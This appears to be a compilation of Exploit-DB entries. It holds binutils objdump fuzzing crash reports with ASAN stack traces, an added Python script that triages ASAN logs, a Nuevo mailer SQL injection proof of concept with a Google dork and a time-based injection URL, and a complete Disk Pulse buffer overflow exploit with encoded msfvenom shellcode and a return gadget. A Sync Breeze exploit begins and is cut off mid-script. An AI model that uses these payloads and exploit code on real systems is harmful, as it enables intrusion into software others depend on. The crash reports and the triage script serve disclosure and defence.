Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21595
I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
Please find attached the minimized file causing the issue ("Input") and the ASAN report log ("Output"). Below is the reduced stacktrace with links to the corresponding source lines on a GitHub mirror.
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
Let me know if there is any additional information I can provide.
--
Input: 3ade4a4333249762a9df82c47f3c111a.65dbcbffa0f6467be847e1372688623b.min
Output: 3ade4a4333249762a9df82c47f3c111a.65dbcbffa0f6467be847e1372688623b.txt
Error in "aarch64_ext_ldst_reglist": global-buffer-overflow
in aarch64_ext_ldst_reglist at opcodes/aarch64-dis.c:412
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L412)
in aarch64_opcode_decode at opcodes/aarch64-dis.c:2739
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2739)
in aarch64_decode_insn at opcodes/aarch64-dis.c:2831
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2831)
in print_insn_aarch64_word at opcodes/aarch64-dis.c:2973
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L2973)
in print_insn_aarch64 at opcodes/aarch64-dis.c:3209
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/aarch64-dis.c#L3209)
in disassemble_bytes at binutils/objdump.c:1864
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42204.zip
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21576
I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.
The command I used was `objdump -D <file>`.
Let me know if there is any additional information I can provide.
--
Input: 2a13a720199253614962e0bb4402d98c.9149a6478708ae7cb458345e7cbc9354.min
Output: 2a13a720199253614962e0bb4402d98c.9149a6478708ae7cb458345e7cbc9354.txt
Error in "print_insn_score16": global-buffer-overflow
in print_insn_score16 at opcodes/score7-dis.c:723
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/score7-dis.c#L723)
in s7_print_insn at opcodes/score7-dis.c:954
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/score7-dis.c#L954)
in disassemble_bytes at binutils/objdump.c:1864
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42203.zip
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21582
I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.
The command I used was `objdump -D <file>`.
Let me know if there is any additional information I can provide.
--
Input: ef51bcdcaae667058b002f94b5dafd05.12926af7cc4fab77f87a3ec70a329100.min
Output: ef51bcdcaae667058b002f94b5dafd05.12926af7cc4fab77f87a3ec70a329100.txt
Error in "ieee_object_p": stack-buffer-overflow
in ieee_object_p at bfd/ieee.c:1985
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L1985)
in bfd_check_format_matches at bfd/format.c:311
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/format.c#L311)
in display_object_bfd at binutils/objdump.c:3602
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3602)
in display_any_bfd at binutils/objdump.c:3693
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3693)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42202.zip
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21581
I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.
The command I used was `objdump -D <file>`.
Let me know if there is any additional information I can provide.
--
Input: 02d8fa874391d563ccfd5911ff5f5cf8.fe651c9b03ff955c157ecee745208476.min
Output: 02d8fa874391d563ccfd5911ff5f5cf8.fe651c9b03ff955c157ecee745208476.txt
Error in "bfd_get_string": stack-buffer-overflow
in bfd_get_string at bfd/ieee.c:198
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L198)
in read_id at bfd/ieee.c:227
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L227)
in ieee_object_p at bfd/ieee.c:1907
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/ieee.c#L1907)
in bfd_check_format_matches at bfd/format.c:311
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/format.c#L311)
in display_object_bfd at binutils/objdump.c:3602
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3602)
in display_any_bfd at binutils/objdump.c:3693
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3693)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42200.zip
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21586
I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.
The command I used was `objdump -D <file>`.
Let me know if there is any additional information I can provide.
--
Input: 5ddfa2412fa85ccaec333ef01e682e5c.1a654bffa0e51502d471945837d8c8d2.min
Output: 5ddfa2412fa85ccaec333ef01e682e5c.1a654bffa0e51502d471945837d8c8d2.txt
Error in "decode_pseudodbg_assert_0": global-buffer-overflow
in decode_pseudodbg_assert_0 at opcodes/bfin-dis.c:4604
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4604)
in _print_insn_bfin at opcodes/bfin-dis.c:4760
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4760)
in print_insn_bfin at opcodes/bfin-dis.c:4778
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4778)
in disassemble_bytes at binutils/objdump.c:1864
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Input: eaa0ea31671f33585380fa20a9e48279.3eb5986fdbd0116801326df1767e6ef0.min
Output: eaa0ea31671f33585380fa20a9e48279.3eb5986fdbd0116801326df1767e6ef0.txt
Error in "decode_pseudodbg_assert_0": global-buffer-overflow
in decode_pseudodbg_assert_0 at opcodes/bfin-dis.c:4596
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4596)
in _print_insn_bfin at opcodes/bfin-dis.c:4760
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4760)
in print_insn_bfin at opcodes/bfin-dis.c:4778
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/bfin-dis.c#L4778)
in disassemble_bytes at binutils/objdump.c:1864
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42201.zip
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21580
I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.
The command I used was `objdump -D <file>`.
Let me know if there is any additional information I can provide.
--
Input: 37a2b1374545eb23eed0eea880de6226.ad5cda09828cea9d238db2184e95406b.min
Output: 37a2b1374545eb23eed0eea880de6226.ad5cda09828cea9d238db2184e95406b.txt
Error in "disassemble_bytes": heap-buffer-overflow
in disassemble_bytes at binutils/objdump.c:1993
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1993)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Input: 77125fccb44694b0db18006db1f0f4d3.64e76dd7ab33d15c8293caeca73c704a.min
Output: 77125fccb44694b0db18006db1f0f4d3.64e76dd7ab33d15c8293caeca73c704a.txt
Error in "disassemble_bytes": heap-buffer-overflow
in disassemble_bytes at binutils/objdump.c:1932
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1932)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Input: c3269b8eae3f3ec0001d835e66795702.6e6557284eb14f91acf6c2576396517c.min
Output: c3269b8eae3f3ec0001d835e66795702.6e6557284eb14f91acf6c2576396517c.txt
Error in "disassemble_bytes": heap-buffer-overflow
in disassemble_bytes at binutils/objdump.c:1926
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1926)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
Proofs of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42199.zip
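The six binutils reports above all apply the same reduction step to an AddressSanitizer log: keep only the symbolized frames, emit one `in <func> at <file>:<line>` pair per frame, and link each to the GitHub mirror at the commit they cite. The Python below is an added example, not the reporter's tooling and not part of binutils; it parses constructed ASAN reports (made-up addresses and PIDs, not the attached logs) into that reduced form, and buckets crashes by the function names of the top frames so that two inputs hitting the same function at different lines, like the two bfin-dis.c inputs in bug 21586 (lines 4596 and 4604), land in one bucket for triage. `MIRROR_BASE` reuses the commit hash from the reports; the function names `parse_asan_report`, `reduce_report`, `crash_signature` and `bucket_reports` are mine.

```python
import re
from collections import defaultdict

# Commit the bug reports above link to on the GitHub mirror.
MIRROR_BASE = "https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca"

# Constructed ASAN reports (not the attached logs). They follow the shape
# AddressSanitizer prints; the two bfin samples crash in the same function
# at different lines, as the two inputs in bug 21586 do.
SAMPLE_AARCH64 = """\
==12345==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000000e5a0c8 at pc 0x00000051d3c4 bp 0x7ffd2c1a3d40 sp 0x7ffd2c1a3d38
READ of size 4 at 0x000000e5a0c8 thread T0
    #0 0x51d3c3 in aarch64_ext_ldst_reglist opcodes/aarch64-dis.c:412:7
    #1 0x5201ab in aarch64_opcode_decode opcodes/aarch64-dis.c:2739:11
    #2 0x4a0b12 in disassemble_bytes binutils/objdump.c:1864:20
    #3 0x4a3f00 in main binutils/objdump.c:4016:7
    #4 0x7f3c5e02a82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
SUMMARY: AddressSanitizer: global-buffer-overflow opcodes/aarch64-dis.c:412:7 in aarch64_ext_ldst_reglist
"""
SAMPLE_BFIN_A = """\
==12346==ERROR: AddressSanitizer: global-buffer-overflow on address 0x000001a3c0f0 at pc 0x0000006b1e22 bp 0x7ffe1b2c5e20 sp 0x7ffe1b2c5e18
READ of size 4 at 0x000001a3c0f0 thread T0
    #0 0x6b1e21 in decode_pseudodbg_assert_0 opcodes/bfin-dis.c:4604:5
    #1 0x6b3a40 in _print_insn_bfin opcodes/bfin-dis.c:4760:9
    #2 0x4a0b12 in disassemble_bytes binutils/objdump.c:1864:20
    #3 0x4a3f00 in main binutils/objdump.c:4016:7
SUMMARY: AddressSanitizer: global-buffer-overflow opcodes/bfin-dis.c:4604:5 in decode_pseudodbg_assert_0
"""
SAMPLE_BFIN_B = SAMPLE_BFIN_A.replace("4604", "4596")

# "==<pid>==ERROR: AddressSanitizer: <type> ..." gives the error class.
ERROR_RE = re.compile(r"^==\d+==ERROR: AddressSanitizer: ([\w-]+)", re.M)
# Frames with a source location look like "#N 0xADDR in func path:line:col";
# frames that only carry "(module+offset)" have no ":line" and are skipped.
FRAME_RE = re.compile(
    r"^[ \t]*#\d+\s+0x[0-9a-fA-F]+\s+in\s+(\S+)\s+([^\s:]+):(\d+)", re.M
)


def parse_asan_report(text):
    """Return the error type and the symbolized frames of one ASAN report."""
    m = ERROR_RE.search(text)
    error_type = m.group(1) if m else "unknown"
    frames = [(func, path, int(line)) for func, path, line in FRAME_RE.findall(text)]
    return {"error_type": error_type, "frames": frames}


def reduce_report(text, mirror_base=MIRROR_BASE):
    """Render the report in the reduced form used by the bug reports above."""
    rep = parse_asan_report(text)
    if not rep["frames"]:
        return f"Error: {rep['error_type']} (no symbolized frames)"
    out = [f'Error in "{rep["frames"][0][0]}": {rep["error_type"]}']
    for func, path, line in rep["frames"]:
        out.append(f"in {func} at {path}:{line}")
        out.append(f"(see {mirror_base}/{path}#L{line})")
    return "\n".join(out)


def crash_signature(rep, depth=3):
    """Function names of the top frames. Line numbers are deliberately dropped
    so inputs hitting the same function at different lines share a bucket."""
    return tuple(func for func, _, _ in rep["frames"][:depth])


def bucket_reports(reports, depth=3):
    """Group report names by crash signature; one bucket per distinct signature."""
    buckets = defaultdict(list)
    for name, text in reports.items():
        buckets[crash_signature(parse_asan_report(text), depth)].append(name)
    return dict(buckets)


if __name__ == "__main__":
    print(reduce_report(SAMPLE_AARCH64))
    samples = {"a64.min": SAMPLE_AARCH64, "bfin1.min": SAMPLE_BFIN_A, "bfin2.min": SAMPLE_BFIN_B}
    for sig, names in bucket_reports(samples).items():
        print(" <- ".join(sig), names)
```

The signature depth of three frames is a triage trade-off: one frame merges unrelated bugs that share a helper, while a full stack splits one bug across every caller path; three in-project frames is a common default and can be tuned per target.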
# Exploit Title: Nuevo mailer version <= 6.0 SQL Injection
# Exploit Author: ALEH BOITSAU
# Google Dork: inurl:/inc/rdr.php?
# Date: 2017-06-09
# Vendor Homepage: https://www.nuevomailer.com/
# Version: 6.0 and below
# Tested on: Linux
Vulnerable script: rdr.php
Vulnerable parameter: r
PoC:
https://vulnerable_site.com/inc/rdr.php?r=69387c602c1056c556%20and%20sleep(10)--+
NB: vendor has been notified.
#!/usr/bin/python
###############################################################################
# Exploit Title: Disk Pulse v9.7.26 - Add Directory Local Buffer Overflow
# Date: 12-06-2017
# Exploit Author: abatchy17 -- @abatchy17
# Vulnerable Software: Disk Pulse v9.7.26 (Freeware, Pro, Ultimate)
# Vendor Homepage: http://www.diskpulse.com/
# Version: 9.7.14
# Software Link: http://www.diskpulse.com/downloads.html (Freeware, Pro, Ultimate)
# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
#
# To trigger the exploit:
# 1. Under Directories, click the plus sign
# 2. Paste content of exploit.txt in Add Directory textbox.
#
# <--- Marry and reproduce --->
#
##############################################################################
a = open("exploit.txt", "w")
badchars = "\x0a\x0d\x2f"
# msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed BufferRegister=EAX -f python -b "\x0a\x0d\x2f"
buf = ""
buf += "\x50\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49"
buf += "\x49\x49\x49\x49\x49\x37\x51\x5a\x6a\x41\x58\x50\x30"
buf += "\x41\x30\x41\x6b\x41\x41\x51\x32\x41\x42\x32\x42\x42"
buf += "\x30\x42\x42\x41\x42\x58\x50\x38\x41\x42\x75\x4a\x49"
buf += "\x6b\x4c\x5a\x48\x4f\x72\x57\x70\x75\x50\x43\x30\x43"
buf += "\x50\x4b\x39\x4d\x35\x44\x71\x79\x50\x63\x54\x6e\x6b"
buf += "\x62\x70\x76\x50\x6e\x6b\x42\x72\x46\x6c\x6e\x6b\x63"
buf += "\x62\x62\x34\x6c\x4b\x43\x42\x76\x48\x36\x6f\x68\x37"
buf += "\x73\x7a\x46\x46\x74\x71\x49\x6f\x4e\x4c\x57\x4c\x55"
buf += "\x31\x51\x6c\x35\x52\x46\x4c\x51\x30\x6a\x61\x6a\x6f"
buf += "\x64\x4d\x67\x71\x6b\x77\x79\x72\x68\x72\x70\x52\x70"
buf += "\x57\x6c\x4b\x53\x62\x36\x70\x6c\x4b\x52\x6a\x67\x4c"
buf += "\x4c\x4b\x50\x4c\x62\x31\x42\x58\x79\x73\x32\x68\x37"
buf += "\x71\x4a\x71\x73\x61\x4e\x6b\x63\x69\x31\x30\x35\x51"
buf += "\x69\x43\x4c\x4b\x50\x49\x64\x58\x58\x63\x46\x5a\x32"
buf += "\x69\x6e\x6b\x36\x54\x4e\x6b\x57\x71\x38\x56\x65\x61"
buf += "\x49\x6f\x6e\x4c\x69\x51\x7a\x6f\x66\x6d\x46\x61\x69"
buf += "\x57\x70\x38\x39\x70\x33\x45\x39\x66\x35\x53\x31\x6d"
buf += "\x68\x78\x75\x6b\x73\x4d\x71\x34\x70\x75\x38\x64\x33"
buf += "\x68\x4e\x6b\x32\x78\x51\x34\x65\x51\x39\x43\x31\x76"
buf += "\x4c\x4b\x64\x4c\x32\x6b\x6e\x6b\x62\x78\x65\x4c\x47"
buf += "\x71\x59\x43\x4c\x4b\x44\x44\x4c\x4b\x56\x61\x38\x50"
buf += "\x6f\x79\x52\x64\x54\x64\x34\x64\x63\x6b\x73\x6b\x50"
buf += "\x61\x50\x59\x71\x4a\x56\x31\x59\x6f\x59\x70\x33\x6f"
buf += "\x53\x6f\x71\x4a\x4c\x4b\x44\x52\x68\x6b\x6e\x6d\x53"
buf += "\x6d\x62\x4a\x56\x61\x4c\x4d\x6b\x35\x6d\x62\x75\x50"
buf += "\x45\x50\x75\x50\x32\x70\x32\x48\x76\x51\x4e\x6b\x30"
buf += "\x6f\x6f\x77\x39\x6f\x4e\x35\x4d\x6b\x58\x70\x4d\x65"
buf += "\x4e\x42\x53\x66\x62\x48\x6d\x76\x4a\x35\x6d\x6d\x4d"
buf += "\x4d\x69\x6f\x79\x45\x57\x4c\x46\x66\x53\x4c\x56\x6a"
buf += "\x6f\x70\x49\x6b\x6d\x30\x33\x45\x33\x35\x4d\x6b\x50"
buf += "\x47\x37\x63\x74\x32\x52\x4f\x53\x5a\x43\x30\x53\x63"
buf += "\x49\x6f\x38\x55\x52\x43\x63\x51\x50\x6c\x65\x33\x54"
buf += "\x6e\x62\x45\x54\x38\x62\x45\x55\x50\x41\x41"
# 0x651c541f : jmp ebp | asciiprint,ascii {PAGE_EXECUTE_READ} [QtGui4.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v4.3.4.0 (C:\Program Files\Disk Pulse\bin\QtGui4.dll)
jmpebp = "\x1f\x54\x1c\x65" # Why JMP EBP? Buffer at ESP is split, bad! Example: EBP: AAA\BBB, ESP -> AAA (without the \BBB part)
llamaleftovers = (
"\x55" # push EBP
"\x58" # pop EAX
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x55\x55\x55\x55" # add EAX, 0x55555555
"\x05\x56\x56\x55\x55" # add EAX, 0x55555656 -> EAX = EBP + 0x200
"\x40" # inc EAX, shellcode generated should start exactly here (EBP + 0x201) as we're using the x86/alpha_mixed with BufferRegister to get a purely alphanumeric shellcode
)
junk = "\x55" + "\x53\x5b" * 107
data = "A"*4096 + jmpebp + "\x40\x48" * 20 + llamaleftovers + junk + buf
a.write(data)
a.close()
#!/usr/bin/python
###############################################################################
# Exploit Title: Sync Breeze v9.7.26 - Local Buffer Overflow
# Date: 11-06-2017
# Exploit Author: @abatchy17 -- www.abatchy.com
# Vulnerable Software: Sync Breeze v9.7.26 (Freeware, Pro and Ultimate)
# Vendor Homepage: http://www.syncbreeze.com
# Version: 9.7.26
# Software Link: http://www.syncbreeze.com/downloads.html (Freeware, Pro and Ultimate)
# Tested On: Windows XP SP3 (x86), Win7 SP1 (x86)
#
# To trigger the exploit:
# 1. click "Add"
# 2. enter any command name
# 3. On new window, scroll down to "Exclude"
# 4. Click "Add Exclude Directory"
# 4. Paste text in exploit.txt into "Directory" field
#
##############################################################################
a = open("exploit.txt", "w")
